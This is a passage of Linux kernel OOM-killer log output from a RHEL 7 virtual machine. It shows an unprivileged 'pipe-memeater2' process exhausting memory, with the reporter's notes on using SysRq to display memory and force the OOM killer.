[   78.861729]  unevictable:0 dirty:0 writeback:0 unstable:0
[   78.861729]  free:13039 slab_reclaimable:5278 slab_unreclaimable:7941
[   78.861729]  mapped:494 shmem:2263 pagetables:4022 bounce:0
[   78.861729]  free_cma:0
[   78.867365] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:2192kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:168kB slab_unreclaimable:440kB kernel_stack:56kB pagetables:108kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[   78.874584] lowmem_reserve[]: 0 1802 1802 1802
[   78.875538] Node 0 DMA32 free:44588kB min:44668kB low:55832kB high:67000kB active_anon:214076kB inactive_anon:8272kB active_file:60kB inactive_file:456kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:1976kB shmem:8928kB slab_reclaimable:20944kB slab_unreclaimable:31324kB kernel_stack:4472kB pagetables:15980kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1254 all_unreclaimable? yes
[   78.883294] lowmem_reserve[]: 0 0 0 0
[   78.884105] Node 0 DMA: 62*4kB (M) 43*8kB (UM) 32*16kB (M) 20*32kB (M) 11*64kB (M) 6*128kB (UM) 3*256kB (UM) 3*512kB (UM) 0*1024kB 1*2048kB (R) 0*4096kB = 7568kB
[   78.887411] Node 0 DMA32: 1975*4kB (UEM) 1278*8kB (UEM) 550*16kB (UEM) 302*32kB (UEM) 61*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44588kB
[   78.890582] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   78.892105] 2425 total pagecache pages
[   78.892799] 0 pages in swap cache
[   78.893421] Swap cache stats: add 0, delete 0, find 0/0
[   78.894381] Free swap  = 0kB
[   78.894915] Total swap = 0kB
[   78.898329] 524287 pages RAM
[   78.898950] 54799 pages reserved
[   78.899634] 527290 pages shared
[   78.900229] 453223 pages non-shared
[   78.900886] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[   78.902341] [  574]     0   574     9231      503      19        0             0 systemd-journal
[   78.903948] [  590]     0   590    29620       80      26        0             0 lvmetad
[   78.905430] [  612]     0   612    10995      330      21        0         -1000 systemd-udevd
[   78.907001] [  704]     0   704    12797       95      23        0         -1000 auditd
[   78.908463] [  717]     0   717    20056       28       9        0             0 audispd
[   78.909981] [  726]     0   726     4189       43      13        0             0 alsactl
[   78.911463] [  728]     0   728    52615      443      55        0             0 abrtd
[   78.912905] [  729]     0   729     6600       78      17        0             0 systemd-logind
[   78.914821] [  730]     0   730     1094       25       8        0             0 rngd
[   78.916266] [  732]     0   732     6551       49      19        0             0 sedispatch
[   78.917787] [  733]     0   733    32515      129      19        0             0 smartd
[   78.919252] [  736]    81   736     7419      337      18        0          -900 dbus-daemon
[   78.920801] [  740]     0   740    51993      341      53        0             0 abrt-watch-log
[   78.922388] [  745]   995   745     2133       37       9        0             0 lsmd
[   78.923820] [  748]     0   748     4829       79      12        0             0 irqbalance
[   78.925388] [  750]     0   750    51993      340      51        0             0 abrt-watch-log
[   78.926943] [  757]     0   757    80894     4240      75        0             0 firewalld
[   78.928443] [  762]     0   762    61592      381      63        0             0 vmtoolsd
[   78.929964] [  763]     0   763    84088      285      64        0             0 ModemManager
[   78.931487] [  770]   172   770    41164       50      16        0             0 rtkit-daemon
[   78.933007] [  773]     0   773    96845      198      42        0             0 accounts-daemon
[   78.934618] [  780]     0   780    54939      449      38        0             0 rsyslogd
[   78.936113] [  781]    70   781     7549       75      21        0             0 avahi-daemon
[   78.937696] [  783]   994   783    28961       93      27        0             0 chronyd
[   78.939164] [  786]     0   786    50842      115      39        0             0 gssproxy
[   78.940651] [  794]     0   794    28812       62      11        0             0 ksmtuned
[   78.942134] [  796]    32   796    16227      131      33        0             0 rpcbind
[   78.943603] [  806]    70   806     7518       59      19        0             0 avahi-daemon
[   78.945148] [  818]   999   818   132797     2567      53        0             0 polkitd
[   78.946618] [  882]     0   882   113615      480      72        0             0 NetworkManager
[   78.948203] [ 1010]     0  1010    13266      145      29        0             0 wpa_supplicant
[   78.949779] [ 1200]     0  1200    27631     3114      54        0             0 dhclient
[   78.951271] [ 1410]     0  1410    20640      213      44        0         -1000 sshd
[   78.952692] [ 1413]     0  1413   138261     2651      86        0             0 tuned
[   78.954129] [ 1416]     0  1416   138875     1130     139        0             0 libvirtd
[   78.955621] [ 1424]     0  1424    31583      151      17        0             0 crond
[   78.957092] [ 1425]     0  1425   118308      753      50        0             0 gdm
[   78.958480] [ 1456]     0  1456     6491       49      17        0             0 atd
[   78.959869] [ 1462]     0  1462    27509       33      11        0             0 agetty
[   78.961291] [ 2488]     0  2488    55958     1573      97        0             0 Xorg
[   78.962720] [ 2575]     0  2575    23306      254      44        0             0 master
[   78.964156] [ 2576]    89  2576    23332      251      46        0             0 pickup
[   78.965583] [ 2577]    89  2577    23349      252      46        0             0 qmgr
[   78.967190] [ 2583]     0  2583    64751      482      57        0          -900 abrt-dbus
[   78.968691] [ 2705]    99  2705     3888       48      11        0             0 dnsmasq
[   78.970167] [ 2706]     0  2706     3881       45      11        0             0 dnsmasq
[   78.971646] [ 2712]     0  2712    89025      249      61        0             0 gdm-session-wor
[   78.973250] [ 2715]    42  2715   140687      403     102        0             0 gnome-session
[   78.974809] [ 2718]    42  2718     3488       36      11        0             0 dbus-launch
[   78.976354] [ 2719]    42  2719     7342      186      17        0             0 dbus-daemon
[   78.977884] [ 2722]    42  2722    85002      155      34        0             0 at-spi-bus-laun
[   78.979483] [ 2728]    42  2728     7168       89      19        0             0 dbus-daemon
[   78.981023] [ 2731]    42  2731    32423      158      34        0             0 at-spi2-registr
[   78.982629] [ 2743]    42  2743   272885     1577     182        0             0 gnome-settings-
[   78.984229] [ 2750]     0  2750    90874      321      61        0             0 upowerd
[   78.985703] [ 2754]    42  2754    76643      143      37        0             0 gvfsd
[   78.987663] [ 2758]    42  2758    73901      174      42        0             0 gvfsd-fuse
[   78.989159] [ 2770]    42  2770   387894    17240     291        0             0 gnome-shell
[   78.990669] [ 2771]   997  2771   101041      373      50        0             0 colord
[   78.992139] [ 2780]    42  2780   111507      295      75        0             0 pulseaudio
[   78.993661] [ 2801]    42  2801    45167      108      25        0             0 dconf-service
[   78.995198] [ 2806]    42  2806   117500      533      47        0             0 ibus-daemon
[   78.996834] [ 2811]    42  2811    98221      686      46        0             0 ibus-dconf
[   78.998353] [ 2813]    42  2813   117506      551     113        0             0 ibus-x11
[   78.999851] [ 2820]    42  2820    98935      402      61        0             0 mission-control
[   79.001442] [ 2822]    42  2822   143741      459      94        0             0 caribou
[   79.002912] [ 2826]     0  2826   101278      258      52        0             0 packagekitd
[   79.006211] [ 2832]    42  2832   178354     1594     141        0             0 goa-daemon
[   79.007731] [ 2867]    42  2867   100148      250      47        0             0 gvfs-udisks2-vo
[   79.009329] [ 2871]     0  2871    92703      782      44        0             0 udisksd
[   79.010795] [ 2878]    42  2878    83626      371      91        0             0 goa-identity-se
[   79.012404] [ 2889]    42  2889   105443      307      58        0             0 gvfs-afc-volume
[   79.014295] [ 2894]    42  2894    78121      168      38        0             0 gvfs-mtp-volume
[   79.015865] [ 2898]    42  2898    74934      137      33        0             0 gvfs-goa-volume
[   79.017473] [ 2902]    42  2902    80390      182      43        0             0 gvfs-gphoto2-vo
[   79.019042] [ 2914]     0  2914    80155      236      57        0          -900 realmd
[   79.020472] [ 2922]    42  2922    79800      679      42        0             0 ibus-engine-sim
[   79.022074] [ 2976]     0  2976    36375      328      73        0             0 sshd
[   79.023483] [ 2980]  1000  2980    36408      326      70        0             0 sshd
[   79.024879] [ 2982]  1000  2982    29142      391      14        0             0 bash
[   79.026277] [ 3075]     0  3075    26974       23      10        0             0 sleep
[   79.027729] [ 3077]  1000  3077     1042       20       7        0             1 pipe-memeater2
[   79.029291] [ 3078]  1000  3078     1042       20       7        0             1 pipe-memeater2
[   79.030897] [ 3079]  1000  3079     1042       20       7        0             1 pipe-memeater2
[   79.032489] [ 3080]  1000  3080     1042       20       7        0             1 pipe-memeater2
[   79.034042] [ 3081]  1000  3081     1042       20       7        0             1 pipe-memeater2
[   79.035603] [ 3082]  1000  3082     1042       20       7        0             1 pipe-memeater2
[   79.037158] [ 3083]  1000  3083     1042       20       7        0             1 pipe-memeater2
[   79.038752] [ 3084]  1000  3084     1042       20       7        0             1 pipe-memeater2
[   79.040301] [ 3085]  1000  3085     1042       20       7        0             1 pipe-memeater2
[   79.041855] [ 3086]  1000  3086     1042       20       7        0             1 pipe-memeater2
[   79.043438] [ 3088]  1000  3088     1042       20       7        0             0 pipe-memeater2
[   79.045025] Out of memory: Kill process 2770 (gnome-shell) score 37 or sacrifice child
[   79.046466] Killed process 2806 (ibus-daemon) total-vm:470000kB, anon-rss:2128kB, file-rss:4kB
(Omitting repetitions)
[  119.938777] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_score_adj=0
[  119.940307] pipe-memeater2 cpuset=/ mems_allowed=0
[  119.941199] CPU: 0 PID: 3088 Comm: pipe-memeater2 Not tainted 3.10.0-123.el7.x86_64 #1
[  119.942645] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[  119.944575]  ffff88005f302d80 000000005d69c4df ffff88005f3ada78 ffffffff815e19ba
[  119.946897]  ffff88005f3adb08 ffffffff815dd02d ffffffff810b68f8 ffff8800666dde50
[  119.948528]  0000000000000202 ffff88005f302d80 ffff88005f3adaf0 ffffffff81102eff
[  119.949989] Call Trace:
[  119.950466]  [<ffffffff815e19ba>] dump_stack+0x19/0x1b
[  119.951424]  [<ffffffff815dd02d>] dump_header+0x8e/0x214
[  119.952398]  [<ffffffff810b68f8>] ? ktime_get_ts+0x48/0xe0
[  119.953413]  [<ffffffff81102eff>] ? delayacct_end+0x8f/0xb0
[  119.954435]  [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0
[  119.955514]  [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0
[  119.956799]  [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30
[  119.957985]  [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0
[  119.958997]  [<ffffffff8114b579>] __alloc_pages_nodemask+0xa09/0xb10
[  119.960145]  [<ffffffff81188779>] alloc_pages_current+0xa9/0x170
[  119.961223]  [<ffffffff811b8954>] pipe_write+0x274/0x540
[  119.962186]  [<ffffffff811af36d>] do_sync_write+0x8d/0xd0
[  119.963159]  [<ffffffff811afb0d>] vfs_write+0xbd/0x1e0
[  119.964094]  [<ffffffff811b0558>] SyS_write+0x58/0xb0
[  119.965014]  [<ffffffff815f2119>] system_call_fastpath+0x16/0x1b
[  119.966102] Mem-Info:
[  119.966528] Node 0 DMA per-cpu:
[  119.967138] CPU    0: hi:    0, btch:   1 usd:   0
[  119.968216] CPU    1: hi:    0, btch:   1 usd:   0
[  119.969247] CPU    2: hi:    0, btch:   1 usd:   0
[  119.970408] CPU    3: hi:    0, btch:   1 usd:   0
[  119.971436] Node 0 DMA32 per-cpu:
[  119.972147] CPU    0: hi:  186, btch:  31 usd:   0
[  119.973018] CPU    1: hi:  186, btch:  31 usd:  30
[  119.973883] CPU    2: hi:  186, btch:  31 usd:  41
[  119.974748] CPU    3: hi:  186, btch:  31 usd:  22
[  119.975626] active_anon:3798 inactive_anon:1649 isolated_anon:0
[  119.975626]  active_file:4 inactive_file:198 isolated_file:0
[  119.975626]  unevictable:0 dirty:0 writeback:0 unstable:0
[  119.975626]  free:13047 slab_reclaimable:4692 slab_unreclaimable:7148
[  119.975626]  mapped:0 shmem:2260 pagetables:530 bounce:0
[  119.975626]  free_cma:0
[  119.981153] Node 0 DMA free:7632kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  119.988478] lowmem_reserve[]: 0 1802 1802 1802
[  119.989412] Node 0 DMA32 free:44612kB min:44668kB low:55832kB high:67000kB active_anon:15064kB inactive_anon:6492kB active_file:16kB inactive_file:376kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28236kB kernel_stack:3608kB pagetables:2112kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:223 all_unreclaimable? yes
[  119.996991] lowmem_reserve[]: 0 0 0 0
[  119.997797] Node 0 DMA: 2*4kB (UM) 8*8kB (UM) 10*16kB (M) 11*32kB (UM) 11*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7560kB
[  120.002259] Node 0 DMA32: 1143*4kB (EM) 966*8kB (UEM) 491*16kB (EM) 345*32kB (UEM) 102*64kB (EM) 23*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44764kB
[  120.007208] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  120.008837] 2506 total pagecache pages
[  120.009721] 0 pages in swap cache
[  120.010395] Swap cache stats: add 0, delete 0, find 0/0
[  120.011755] Free swap  = 0kB
[  120.012363] Total swap = 0kB
[  120.016138] 524287 pages RAM
[  120.016878] 54799 pages reserved
[  120.017911] 525985 pages shared
[  120.018652] 454436 pages non-shared
[  120.019391] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[  120.021231] [  590]     0   590    29620       80      26        0             0 lvmetad
[  120.023399] [  612]     0   612    10995      330      21        0         -1000 systemd-udevd
[  120.025409] [  704]     0   704    12797       95      23        0         -1000 auditd
[  120.027072] [  717]     0   717    20056       28       9        0             0 audispd
[  120.029071] [  726]     0   726     4189       43      13        0             0 alsactl
[  120.031114] [  729]     0   729     6600       80      17        0             0 systemd-logind
[  120.032827] [  730]     0   730     1094       25       8        0             0 rngd
[  120.034420] [  732]     0   732     6551       49      19        0             0 sedispatch
[  120.036194] [  736]    81   736     7419      337      18        0          -900 dbus-daemon
[  120.037949] [  745]   995   745     2133       37       9        0             0 lsmd
[  120.039411] [  748]     0   748     4829       78      12        0             0 irqbalance
[  120.041107] [  770]   172   770    41164       53      16        0             0 rtkit-daemon
[  120.042884] [  781]    70   781     7549       76      21        0             0 avahi-daemon
[  120.045308] [  794]     0   794    28812       62      11        0             0 ksmtuned
[  120.047005] [  806]    70   806     7518       59      19        0             0 avahi-daemon
[  120.048535] [ 1410]     0  1410    20640      213      44        0         -1000 sshd
[  120.049944] [ 1456]     0  1456     6491       49      17        0             0 atd
[  120.051333] [ 1462]     0  1462    27509       33      11        0             0 agetty
[  120.052764] [ 2583]     0  2583    64751      493      57        0          -900 abrt-dbus
[  120.054299] [ 2705]    99  2705     3888       47      11        0             0 dnsmasq
[  120.056124] [ 2706]     0  2706     3881       45      11        0             0 dnsmasq
[  120.057652] [ 2914]     0  2914    80155      255      57        0          -900 realmd
[  120.059087] [ 3075]     0  3075    26974       23      10        0             0 sleep
[  120.060508] [ 3088]  1000  3088     1042       20       7        0             0 pipe-memeater2
[  120.062067] [ 3089]     0  3089     2732       32       9        0             0 systemd-cgroups
[  120.063637] [ 3090]     0  3090    19084       33      10        0             0 systemd-cgroups
[  120.065210] [ 3091]     0  3091    19084       33       9        0             0 systemd-cgroups
[  120.066939] [ 3092]     0  3092     2719       27       9        0             0 systemd-cgroups
[  120.069145] Out of memory: Kill process 590 (lvmetad) score 0 or sacrifice child
[  120.071126] Killed process 590 (lvmetad) total-vm:118480kB, anon-rss:320kB, file-rss:0kB
(I pressed SysRq-m to display memory information, because the system was still not responding.)
[  209.378474] SysRq : Show Memory
[  209.379117] Mem-Info:
[  209.379560] Node 0 DMA per-cpu:
[  209.380184] CPU    0: hi:    0, btch:   1 usd:   0
[  209.381073] CPU    1: hi:    0, btch:   1 usd:   0
[  209.381968] CPU    2: hi:    0, btch:   1 usd:   0
[  209.382852] CPU    3: hi:    0, btch:   1 usd:   0
[  209.383736] Node 0 DMA32 per-cpu:
[  209.384383] CPU    0: hi:  186, btch:  31 usd:  91
[  209.385281] CPU    1: hi:  186, btch:  31 usd:  53
[  209.386171] CPU    2: hi:  186, btch:  31 usd:  92
[  209.387054] CPU    3: hi:  186, btch:  31 usd: 138
[  209.387947] active_anon:3716 inactive_anon:1649 isolated_anon:0
[  209.387947]  active_file:28 inactive_file:8 isolated_file:0
[  209.387947]  unevictable:0 dirty:0 writeback:0 unstable:0
[  209.387947]  free:12757 slab_reclaimable:4692 slab_unreclaimable:7146
[  209.387947]  mapped:68 shmem:2260 pagetables:504 bounce:0
[  209.387947]  free_cma:0
[  209.393582] Node 0 DMA free:7592kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  209.400851] lowmem_reserve[]: 0 1802 1802 1802
[  209.401815] Node 0 DMA32 free:43436kB min:44668kB low:55832kB high:67000kB active_anon:14736kB inactive_anon:6492kB active_file:112kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:272kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28228kB kernel_stack:3608kB pagetables:2008kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:824 all_unreclaimable? yes
[  209.409563] lowmem_reserve[]: 0 0 0 0
[  209.410386] Node 0 DMA: 16*4kB (M) 13*8kB (UM) 10*16kB (M) 11*32kB (UM) 10*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7592kB
[  209.413721] Node 0 DMA32: 1009*4kB (EM) 937*8kB (EM) 476*16kB (UEM) 345*32kB (UEM) 103*64kB (UEM) 20*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 43436kB
[  209.416997] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  209.418540] 2312 total pagecache pages
[  209.419241] 0 pages in swap cache
[  209.419859] Swap cache stats: add 0, delete 0, find 0/0
[  209.420824] Free swap  = 0kB
[  209.421370] Total swap = 0kB
[  209.424943] 524287 pages RAM
[  209.425506] 54799 pages reserved
[  209.426111] 525960 pages shared
[  209.426705] 454446 pages non-shared
(I pressed SysRq-m again to display memory information, because the system was still not responding.)
[  279.574636] SysRq : Show Memory
[  279.575281] Mem-Info:
[  279.575727] Node 0 DMA per-cpu:
[  279.576351] CPU    0: hi:    0, btch:   1 usd:   0
[  279.577240] CPU    1: hi:    0, btch:   1 usd:   0
[  279.578135] CPU    2: hi:    0, btch:   1 usd:   0
[  279.579025] CPU    3: hi:    0, btch:   1 usd:   0
[  279.579911] Node 0 DMA32 per-cpu:
[  279.580559] CPU    0: hi:  186, btch:  31 usd:  91
[  279.581454] CPU    1: hi:  186, btch:  31 usd:  53
[  279.582342] CPU    2: hi:  186, btch:  31 usd:  92
[  279.583229] CPU    3: hi:  186, btch:  31 usd: 138
[  279.584119] active_anon:3716 inactive_anon:1649 isolated_anon:0
[  279.584119]  active_file:28 inactive_file:8 isolated_file:0
[  279.584119]  unevictable:0 dirty:0 writeback:0 unstable:0
[  279.584119]  free:12757 slab_reclaimable:4692 slab_unreclaimable:7146
[  279.584119]  mapped:68 shmem:2260 pagetables:504 bounce:0
[  279.584119]  free_cma:0
[  279.589776] Node 0 DMA free:7592kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  279.597050] lowmem_reserve[]: 0 1802 1802 1802
[  279.598024] Node 0 DMA32 free:43436kB min:44668kB low:55832kB high:67000kB active_anon:14736kB inactive_anon:6492kB active_file:112kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:272kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28228kB kernel_stack:3608kB pagetables:2008kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:824 all_unreclaimable? yes
[  279.605826] lowmem_reserve[]: 0 0 0 0
[  279.606659] Node 0 DMA: 16*4kB (M) 13*8kB (UM) 10*16kB (M) 11*32kB (UM) 10*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7592kB
[  279.610016] Node 0 DMA32: 1009*4kB (EM) 937*8kB (EM) 476*16kB (UEM) 345*32kB (UEM) 103*64kB (UEM) 20*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 43436kB
[  279.613298] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  279.614840] 2312 total pagecache pages
[  279.615539] 0 pages in swap cache
[  279.616166] Swap cache stats: add 0, delete 0, find 0/0
[  279.617134] Free swap  = 0kB
[  279.617676] Total swap = 0kB
[  279.621228] 524287 pages RAM
[  279.622185] 54799 pages reserved
[  279.622791] 525928 pages shared
[  279.623369] 454446 pages non-shared
(I pressed SysRq-f to invoke the OOM killer manually, because the OOM killer was not invoked automatically even though DMA32's free: was already below the min: watermark.)
[  297.411498] SysRq : Manual OOM execution
[  297.412450] kworker/0:2 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0
[  297.413837] kworker/0:2 cpuset=/ mems_allowed=0
[  297.414701] CPU: 0 PID: 297 Comm: kworker/0:2 Not tainted 3.10.0-123.el7.x86_64 #1
[  297.416070] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[  297.418031] Workqueue: events moom_callback
[  297.418817]  ffff880036ebc440 00000000d84a44d3 ffff880036a3fc70 ffffffff815e19ba
[  297.420273]  ffff880036a3fd00 ffffffff815dd02d ffff880036a3fe04 ffff880036a407d0
[  297.421755]  ffff88003689c000 0000000000000004 ffff880036a3fcc8 0000000200000000
[  297.423197] Call Trace:
[  297.423670]  [<ffffffff815e19ba>] dump_stack+0x19/0x1b
[  297.424601]  [<ffffffff815dd02d>] dump_header+0x8e/0x214
[  297.425571]  [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0
[  297.426639]  [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0
[  297.427744]  [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30
[  297.428889]  [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0
[  297.429921]  [<ffffffff8137bc3d>] moom_callback+0x4d/0x50
[  297.430904]  [<ffffffff8107e02b>] process_one_work+0x17b/0x460
[  297.431989]  [<ffffffff8107edfb>] worker_thread+0x11b/0x400
[  297.433040]  [<ffffffff8107ece0>] ? rescuer_thread+0x400/0x400
[  297.434092]  [<ffffffff81085aef>] kthread+0xcf/0xe0
[  297.434981]  [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140
[  297.436168]  [<ffffffff815f206c>] ret_from_fork+0x7c/0xb0
[  297.437257]  [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140
[  297.438461] Mem-Info:
[  297.438896] Node 0 DMA per-cpu:
[  297.439510] CPU    0: hi:    0, btch:   1 usd:   0
[  297.440405] CPU    1: hi:    0, btch:   1 usd:   0
[  297.441288] CPU    2: hi:    0, btch:   1 usd:   0
[  297.442171] CPU    3: hi:    0, btch:   1 usd:   0
[  297.443056] Node 0 DMA32 per-cpu:
[  297.443701] CPU    0: hi:  186, btch:  31 usd:  91
[  297.444590] CPU    1: hi:  186, btch:  31 usd:  53
[  297.445473] CPU    2: hi:  186, btch:  31 usd:  92
[  297.446358] CPU    3: hi:  186, btch:  31 usd: 138
[  297.447242] active_anon:3716 inactive_anon:1649 isolated_anon:0
[  297.447242]  active_file:28 inactive_file:8 isolated_file:0
[  297.447242]  unevictable:0 dirty:0 writeback:0 unstable:0
[  297.447242]  free:12757 slab_reclaimable:4692 slab_unreclaimable:7146
[  297.447242]  mapped:68 shmem:2260 pagetables:504 bounce:0
[  297.447242]  free_cma:0
[  297.453048] Node 0 DMA free:7592kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  297.460221] lowmem_reserve[]: 0 1802 1802 1802
[  297.461163] Node 0 DMA32 free:43436kB min:44668kB low:55832kB high:67000kB active_anon:14736kB inactive_anon:6492kB active_file:112kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:272kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28228kB kernel_stack:3608kB pagetables:2008kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:824 all_unreclaimable? yes
[  297.469732] lowmem_reserve[]: 0 0 0 0
[  297.470565] Node 0 DMA: 16*4kB (M) 13*8kB (UM) 10*16kB (M) 11*32kB (UM) 10*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7592kB
[  297.473931] Node 0 DMA32: 1009*4kB (EM) 937*8kB (EM) 476*16kB (UEM) 345*32kB (UEM) 103*64kB (UEM) 20*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 43436kB
[  297.477216] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  297.478752] 2312 total pagecache pages
[  297.479453] 0 pages in swap cache
[  297.480080] Swap cache stats: add 0, delete 0, find 0/0
[  297.481058] Free swap  = 0kB
[  297.481596] Total swap = 0kB
[  297.485061] 524287 pages RAM
[  297.485624] 54799 pages reserved
[  297.486234] 525928 pages shared
[  297.486826] 454446 pages non-shared
[  297.487486] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[  297.488954] [  612]     0   612    10995      330      21        0         -1000 systemd-udevd
[  297.490531] [  704]     0   704    12797       95      23        0         -1000 auditd
[  297.492002] [  717]     0   717    20056       69       9        0             0 audispd
[  297.493481] [  726]     0   726     4189       43      13        0             0 alsactl
[  297.494963] [  729]     0   729     6600       77      17        0             0 systemd-logind
[  297.496545] [  730]     0   730     1094       25       8        0             0 rngd
[  297.497986] [  732]     0   732     6551       49      19        0             0 sedispatch
[  297.499506] [  736]    81   736     7419      337      18        0          -900 dbus-daemon
[  297.501759] [  745]   995   745     2133       37       9        0             0 lsmd
[  297.503207] [  748]     0   748     4829       78      12        0             0 irqbalance
[  297.504741] [  770]   172   770    41164       56      16        0             0 rtkit-daemon
[  297.506298] [  781]    70   781     7549       76      21        0             0 avahi-daemon
[  297.507855] [  794]     0   794    28812       62      11        0             0 ksmtuned
[  297.509361] [  806]    70   806     7518       59      19        0             0 avahi-daemon
[  297.510917] [ 1410]     0  1410    20640      213      44        0         -1000 sshd
[  297.512358] [ 1456]     0  1456     6491       49      17        0             0 atd
[  297.513797] [ 1462]     0  1462    27509       33      11        0             0 agetty
[  297.515266] [ 2583]     0  2583    64751      493      57        0          -900 abrt-dbus
[  297.516777] [ 2705]    99  2705     3888       47      11        0             0 dnsmasq
[  297.518255] [ 2706]     0  2706     3881       45      11        0             0 dnsmasq
[  297.519756] [ 2914]     0  2914    80155      255      57        0          -900 realmd
[  297.521218] [ 3075]     0  3075    26974       23      10        0             0 sleep
[  297.522669] [ 3088]  1000  3088     1042       20       7        0             0 pipe-memeater2
[  297.524263] [ 3089]     0  3089     2732       32       9        0             0 systemd-cgroups
[  297.525861] [ 3090]     0  3090    19084       33      10        0             0 systemd-cgroups
[  297.527466] [ 3091]     0  3091    19084       33       9        0             0 systemd-cgroups
[  297.529070] [ 3092]     0  3092     2719       27       9        0             0 systemd-cgroups
[  297.530666] Out of memory: Kill process 781 (avahi-daemon) score 0 or sacrifice child
[  297.532093] Killed process 806 (avahi-daemon) total-vm:30072kB, anon-rss:236kB, file-rss:0kB
